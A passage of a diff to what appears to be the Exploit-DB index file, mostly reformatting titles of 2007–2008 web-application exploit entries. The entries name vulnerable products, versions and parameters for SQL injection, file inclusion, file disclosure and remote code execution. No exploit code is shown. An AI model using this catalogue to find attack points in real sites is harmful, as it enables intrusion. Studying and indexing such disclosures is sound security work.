Injection",2007-10-08,"Khashayar Fereidani",php,webapps,0 4505,platforms/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution",2007-10-09,BlackHawk,php,webapps,0 @@ -18804,25 +18805,25 @@ id,file,description,date,author,platform,type,port 4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - 'emc.asp' SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - 'dl.php' Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0 4581,platforms/php/webapps/4581.txt,"Sige 0.1 - 'sige_init.php' Remote File Inclusion",2007-10-28,GoLd_M,php,webapps,0 -4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",php,webapps,0 +4582,platforms/php/webapps/4582.txt,"teatro 1.6 - 'basePath' Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",php,webapps,0 4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - Remote File Inclusion",2007-10-29,r00t@zapak.com,php,webapps,0 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Arbitrary File Upload",2007-10-29,r00t@zapak.com,php,webapps,0 4587,platforms/php/webapps/4587.txt,"MiniBB 2.1 - 'table' SQL Injection",2007-10-30,irk4z,php,webapps,0 -4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - (dir_ws) Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0 +4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - 'dir_ws' Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0 4589,platforms/php/webapps/4589.htm,"PHP-AGTC Membership System 1.1a - Remote Add Admin",2007-10-30,0x90,php,webapps,0 -4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 -4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 - download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 +4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - 'file' Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 +4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 - 'download.php' Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 4595,platforms/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - PHP Remote Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusions",2007-11-02,GoLd_M,php,webapps,0 -4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - 'index.php module' Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 +4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - 'index.php?module' Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 - 'includes.inc selskin' Remote File Inclusion",2007-11-03,irk4z,php,webapps,0 4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0 -4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - 'common.php pathdot' Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0 +4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - 'common.php?pathdot' Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0 4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion",2007-11-04,ShAy6oOoN,php,webapps,0 4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - 'site' Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0 -4607,platforms/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0 +4607,platforms/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - 'cmsdir' Remote File Inclusion",2007-11-04,mdx,php,webapps,0 4608,platforms/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution",2007-11-05,DarkFig,php,webapps,0 4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c - SQL Injection",2007-11-05,Q7x,asp,webapps,0 4611,platforms/php/webapps/4611.txt,"jPORTAL 2 - 'mailer.php' SQL Injection",2007-11-06,Kacper,php,webapps,0 @@ -18852,13 +18853,13 @@ id,file,description,date,author,platform,type,port 4641,platforms/php/webapps/4641.txt,"Alstrasoft e-Friends 4.98 - 'seid' Multiple SQL Injections",2007-11-21,K-159,php,webapps,0 4642,platforms/php/webapps/4642.txt,"DevMass Shopping Cart 1.0 - Remote File Inclusion",2007-11-22,S.W.A.T.,php,webapps,0 4643,platforms/php/webapps/4643.py,"VigileCMS 1.8 - Stealth Remote Command Execution",2007-11-22,The:Paradox,php,webapps,0 -4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - (nsearch) SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 -4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - 'index.php cat' SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 +4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - 'nsearch' SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 +4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - 'index.php?cat' SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 - 'article.php' SQL Injection",2007-11-22,Shadowleet,php,webapps,0 4647,platforms/cgi/webapps/4647.txt,"KB-Bestellsystem - 'kb_whois.cgi' Command Execution",2007-11-22,"Zero X",cgi,webapps,0 4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0 -4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 -4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 - 'show_content.php id' Local File Inclusion",2007-11-24,Crackers_Child,php,webapps,0 +4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - 'skin_file' Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 +4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 - 'show_content.php?id' Local File Inclusion",2007-11-24,Crackers_Child,php,webapps,0 4653,platforms/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - 'events.php' SQL Injection",2007-11-24,ka0x,php,webapps,0 4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps,0 @@ -18869,31 +18870,31 @@ id,file,description,date,author,platform,type,port 4661,platforms/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change",2007-11-26,nexen,php,webapps,0 4662,platforms/php/webapps/4662.txt,"Tilde CMS 4.x - 'aarstal' SQL Injection",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 4665,platforms/php/webapps/4665.txt,"Eurologon CMS - Multiple SQL Injections",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 -4666,platforms/php/webapps/4666.txt,"Eurologon CMS - files.php Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 +4666,platforms/php/webapps/4666.txt,"Eurologon CMS - 'files.php' Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4667,platforms/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4668,platforms/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple SQL Injections",2007-11-27,Kacper,php,webapps,0 -4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 - 'index.php act' Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0 +4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 - 'index.php?act' Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0 4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - 'include.php' Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0 4671,platforms/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusions",2007-11-28,MhZ91,php,webapps,0 4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusions",2007-11-28,MhZ91,php,webapps,0 4674,platforms/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 - Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 -4675,platforms/php/webapps/4675.txt,"NoAh 0.9 pre 1.2 - (filepath) Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 +4675,platforms/php/webapps/4675.txt,"NoAh 0.9 pre 1.2 - 'filepath' Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 4676,platforms/php/webapps/4676.txt,"Web-MeetMe 3.0.3 - 'play.php' Remote File Disclosure",2007-11-29,Evil.Man,php,webapps,0 4677,platforms/php/webapps/4677.txt,"WebED 0.0.9 - 'index.php' Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4678,platforms/php/webapps/4678.php,"Seditio CMS 121 - SQL Injection",2007-11-29,InATeam,php,webapps,0 -4679,platforms/php/webapps/4679.txt,"KML share 1.1 - 'region.php layer' Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 -4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 +4679,platforms/php/webapps/4679.txt,"KML share 1.1 - 'region.php?layer' Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 +4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - 'sFilePath' Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4681,platforms/php/webapps/4681.txt,"ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass",2007-11-29,Omni,php,webapps,0 4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusions",2007-12-01,ShAy6oOoN,php,webapps,0 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Local/Remote File Inclusion",2007-12-01,Crackers_Child,php,webapps,0 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 -4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 +4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - 'Active.asp' SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0 4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 -4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - 'index.php link' Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 +4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - 'index.php?link' Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 4696,platforms/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities",2007-12-06,GoLd_M,php,webapps,0 -4697,platforms/asp/webapps/4697.txt,"MWOpen E-Commerce - leggi_commenti.asp SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps,0 +4697,platforms/asp/webapps/4697.txt,"MWOpen E-Commerce - 'leggi_commenti.asp' SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps,0 4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - 'download_file.php' File Disclosure",2007-12-08,GoLd_M,php,webapps,0 4705,platforms/php/webapps/4705.txt,"Flat PHP Board 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0 4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 - 'index.php' SQL Injection",2007-12-09,S.W.A.T.,php,webapps,0 @@ -18905,12 +18906,12 @@ id,file,description,date,author,platform,type,port 4712,platforms/php/webapps/4712.txt,"falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting",2007-12-10,MhZ91,php,webapps,0 4714,platforms/php/webapps/4714.pl,"MonAlbum 0.87 - Arbitrary File Upload / Password Grabber Exploit",2007-12-10,v0l4arrra,php,webapps,0 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Encryption Plugin - 'deletekey()' Command Injection",2007-12-11,Backdoored,php,webapps,0 -4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php template' Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 +4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php?template' Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 4722,platforms/php/webapps/4722.txt,"ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0 4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 - 'head.php' Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0 -4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software - (category_id) SQL Injection",2007-12-13,MurderSkillz,php,webapps,0 +4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software - 'category_id' SQL Injection",2007-12-13,MurderSkillz,php,webapps,0 4728,platforms/php/webapps/4728.txt,"Mms Gallery PHP 1.0 - 'id' Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - 'filedownload.php' Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 @@ -18919,9 +18920,9 @@ id,file,description,date,author,platform,type,port 4734,platforms/php/webapps/4734.txt,"Anon Proxy Server 0.1000 - Remote Command Execution",2007-12-14,"Michael Brooks",php,webapps,0 4735,platforms/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-12-14,"Michael Brooks",php,webapps,0 4736,platforms/php/webapps/4736.txt,"Form Tools 1.5.0b - Multiple Remote File Inclusions",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 -4737,platforms/php/webapps/4737.txt,"PHP Real Estate - 'fullnews.php id' SQL Injection",2007-12-14,t0pP8uZz,php,webapps,0 +4737,platforms/php/webapps/4737.txt,"PHP Real Estate - 'fullnews.php?id' SQL Injection",2007-12-14,t0pP8uZz,php,webapps,0 4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,php,webapps,0 -4739,platforms/php/webapps/4739.pl,"MOG-WebShop - 'index.php group' SQL Injection",2007-12-18,k1tk4t,php,webapps,0 +4739,platforms/php/webapps/4739.pl,"MOG-WebShop - 'index.php?group' SQL Injection",2007-12-18,k1tk4t,php,webapps,0 4740,platforms/php/webapps/4740.pl,"FreeWebShop 2.2.1 - Blind SQL Injection",2007-12-18,k1tk4t,php,webapps,0 4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x - Arbitrary File Upload",2007-12-18,Don,php,webapps,0 4743,platforms/php/webapps/4743.pl,"FreeWebShop 2.2.7 - 'cookie' Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 @@ -18931,22 +18932,22 @@ id,file,description,date,author,platform,type,port 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0 4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - 'output' Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0 -4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0 +4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - 'loadadminpage' Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0 4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 - Local File Inclusion / SQL Injection",2007-12-21,irk4z,php,webapps,0 -4766,platforms/php/webapps/4766.txt,"mBlog 1.2 - (page) Remote File Disclosure",2007-12-21,irk4z,php,webapps,0 +4766,platforms/php/webapps/4766.txt,"mBlog 1.2 - 'page' Remote File Disclosure",2007-12-21,irk4z,php,webapps,0 4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusions",2007-12-21,MhZ91,php,webapps,0 4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0 -4769,platforms/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0 +4769,platforms/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - 'POST' Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0 4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - 'category.php' SQL Injection",2007-12-22,Koller,php,webapps,0 4771,platforms/php/webapps/4771.txt,"IP Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps,0 4772,platforms/php/webapps/4772.txt,"zBlog 1.2 - SQL Injection",2007-12-22,Houssamix,php,webapps,0 4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - 'go.php' SQL Injection",2007-12-23,DNX,php,webapps,0 4775,platforms/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,php,webapps,0 -4776,platforms/php/webapps/4776.txt,"MMSLamp - (idpro) SQL Injection",2007-12-23,x0kster,php,webapps,0 +4776,platforms/php/webapps/4776.txt,"MMSLamp - 'idpro' SQL Injection",2007-12-23,x0kster,php,webapps,0 4777,platforms/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - 'pageid' SQL Injection",2007-12-24,bypass,php,webapps,0 4778,platforms/php/webapps/4778.txt,"MeGaCheatZ 1.1 - Multiple SQL Injections",2007-12-24,MhZ91,php,webapps,0 4779,platforms/php/webapps/4779.php,"CuteNews 1.4.5 - Admin Password md5 Hash Fetching Exploit",2007-12-24,waraxe,php,webapps,0 -4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 - 'index.php loadadminpage' Remote File Inclusion",2007-12-24,Koller,php,webapps,0 +4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 - 'index.php?loadadminpage' Remote File Inclusion",2007-12-24,Koller,php,webapps,0 4781,platforms/php/webapps/4781.php,"Jupiter 1.1.5ex - Privilege Escalation",2007-12-24,BugReport.IR,php,webapps,0 4782,platforms/php/webapps/4782.txt,"Agares phpAutoVideo 2.21 - Local/Remote File Inclusion",2007-12-24,MhZ91,php,webapps,0 4783,platforms/php/webapps/4783.txt,"Joomla! Component mosDirectory 2.3.2 - Remote File Inclusion",2007-12-24,ShockShadow,php,webapps,0 @@ -18958,13 +18959,13 @@ id,file,description,date,author,platform,type,port 4790,platforms/php/webapps/4790.txt,"RunCMS 1.6 - Multiple Vulnerabilities",2007-12-25,DSecRG,php,webapps,0 4791,platforms/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 - SQL Injection",2007-12-25,EgiX,php,webapps,0 4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS evasion)",2007-12-26,sh2kerr,php,webapps,0 -4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A - (All Modules) SQL Injection",2007-12-26,JosS,php,webapps,0 +4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A (All Modules) - SQL Injection",2007-12-26,JosS,php,webapps,0 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0 4796,platforms/php/webapps/4796.txt,"PNPHPBB2 < 1.2i - 'PHPEx' Local File Inclusion",2007-12-26,irk4z,php,webapps,0 4798,platforms/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,php,webapps,0 4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0 -4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - showcode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0 +4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - 'showcode.php' Remote Command Execution",2007-12-28,MhZ91,php,webapps,0 4802,platforms/php/webapps/4802.txt,"XCMS 1.82 - Local/Remote File Inclusion",2007-12-28,nexen,php,webapps,0 4804,platforms/php/webapps/4804.txt,"Hot or Not Clone by Jnshosts.com - Database Backup Dump",2007-12-28,RoMaNcYxHaCkEr,php,webapps,0 4805,platforms/php/webapps/4805.txt,"NoseRub 0.5.2 - Login SQL Injection",2007-12-28,"Felix Groebert",php,webapps,0 @@ -18977,17 +18978,17 @@ id,file,description,date,author,platform,type,port 4813,platforms/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,php,webapps,0 4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS - Arbitrary File Upload / Disclosure",2007-12-30,BugReport.IR,php,webapps,0 4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps,0 -4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0 +4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - 'p' Local File Inclusion",2007-12-30,jackal,php,webapps,0 4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - 'cat' SQL Injection",2007-12-30,IHTeam,php,webapps,0 4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - 'id' SQL Injection",2007-12-31,MhZ91,php,webapps,0 4822,platforms/php/webapps/4822.txt,"MyPHP Forum 3.0 (Final) - Multiple SQL Injections",2007-12-31,x0kster,php,webapps,0 -4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - 'rss.php albumnr' SQL Injection",2007-12-31,Silentz,php,webapps,0 -4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection",2007-12-31,Guga360,asp,webapps,0 +4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - 'rss.php?albumnr' SQL Injection",2007-12-31,Silentz,php,webapps,0 +4824,platforms/asp/webapps/4824.py,"oneSCHOOL - 'admin/login.asp' SQL Injection",2007-12-31,Guga360,asp,webapps,0 4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - 'index.php' SQL Injection",2007-12-31,x0kster,php,webapps,0 4827,platforms/php/webapps/4827.txt,"Joomla! Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - 'download2.php' File Disclosure",2008-01-01,GoLd_M,php,webapps,0 4830,platforms/php/webapps/4830.txt,"ClipShare - 'UID' SQL Injection",2008-01-02,Krit,php,webapps,0 -4831,platforms/php/webapps/4831.txt,"MyPHP Forum 3.0 - (Final) SQL Injection",2008-01-03,The:Paradox,php,webapps,0 +4831,platforms/php/webapps/4831.txt,"MyPHP Forum 3.0 - 'Final' SQL Injection",2008-01-03,The:Paradox,php,webapps,0 4832,platforms/php/webapps/4832.php,"Site@School 2.4.10 - Blind SQL Injection",2008-01-03,EgiX,php,webapps,0 4833,platforms/php/webapps/4833.txt,"NetRisk 1.9.7 - Local/Remote File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0 4834,platforms/php/webapps/4834.txt,"samPHPweb 4.2.2 - 'db.php' Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps,0 @@ -19028,12 +19029,12 @@ id,file,description,date,author,platform,type,port 4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 4882,platforms/php/webapps/4882.txt,"MTCMS 2.0 - SQL Injection",2008-01-10,"Virangar Security",php,webapps,0 4883,platforms/php/webapps/4883.txt,"DomPHP 0.81 - 'index.php' Remote File Inclusion",2008-01-10,Houssamix,php,webapps,0 -4884,platforms/php/webapps/4884.php,"Evilsentinel 1.0.9 - (Multiple Vulnerabilities) Disable Exploit",2008-01-10,BlackHawk,php,webapps,0 +4884,platforms/php/webapps/4884.php,"Evilsentinel 1.0.9 - Multiple Vulnerabilities Disable Exploit",2008-01-10,BlackHawk,php,webapps,0 4886,platforms/php/webapps/4886.pl,"iGaming CMS 1.3.1/1.5 - SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 4887,platforms/php/webapps/4887.htm,"DigitalHive 2.0 RC2 - 'user_id' SQL Injection",2008-01-11,j0j0,php,webapps,0 4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 - 'cat' SQL Injection",2008-01-11,MhZ91,php,webapps,0 4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusions",2008-01-11,k1n9k0ng,php,webapps,0 -4890,platforms/php/webapps/4890.txt,"AJchat 0.10 - 'unset()' bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 +4890,platforms/php/webapps/4890.txt,"AJchat 0.10 - 'unset''' bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - '/lib.regset.php/non-blind' SQL Injection",2008-01-11,rgod,php,webapps,0 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0 4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps,0 @@ -19415,7 +19416,7 @@ id,file,description,date,author,platform,type,port 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps,0 5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - 'id' Blind SQL Injection",2008-04-10,irvian,php,webapps,0 5423,platforms/php/webapps/5423.txt,"Ksemail - Local File Inclusion",2008-04-10,dun,php,webapps,0 -5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 - (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 +5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 - no database Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'fotoID' SQL Injection",2008-04-10,S@BUN,php,webapps,0 5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"NewsOffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 @@ -19434,7 +19435,7 @@ id,file,description,date,author,platform,type,port 5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - 'article' SQL Injection",2008-04-14,Crackers_Child,php,webapps,0 5447,platforms/php/webapps/5447.txt,"Dream4 Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,php,webapps,0 5448,platforms/php/webapps/5448.txt,"Dream4 Koobi Pro 6.25 Poll - 'poll_id' SQL Injection",2008-04-14,S@BUN,php,webapps,0 -5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0 +5449,platforms/php/webapps/5449.php,"KwsPHP - 'Upload' Remote Code Execution",2008-04-14,Ajax,php,webapps,0 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'cat_id' SQL Injection",2008-04-15,JosS,php,webapps,0 5452,platforms/php/webapps/5452.txt,"LightNEasy sqlite / no database 1.2.2 - 